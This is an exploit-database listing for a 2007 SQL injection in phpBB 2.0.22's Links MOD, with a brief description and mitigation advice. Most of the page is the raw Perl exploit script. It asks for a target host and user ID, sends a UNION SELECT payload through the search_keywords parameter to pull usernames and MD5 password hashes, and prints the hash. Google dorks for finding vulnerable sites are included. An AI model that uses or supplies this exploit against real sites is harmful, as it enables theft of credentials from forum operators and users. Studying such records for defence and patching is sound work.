header-logo
Suggest Exploit
vendor:
phpBB
by:
Don
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: phpBB
Affected Version From: phpBB <= 2.0.22
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

This exploit targets a remote SQL injection vulnerability in phpBB version 2.0.22 with Links MOD version 1.2.2. By manipulating the 'search_keywords' parameter in the 'links.php' script, an attacker can execute arbitrary SQL queries on the underlying database and retrieve sensitive information such as usernames and hashed passwords.

Mitigation:

Upgrade to a patched version of phpBB and Links MOD. Sanitize user input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl

print q{

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
   or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

# milw0rm.com [2007-08-31]

Navigation

Suggest Exploit

Services By CQR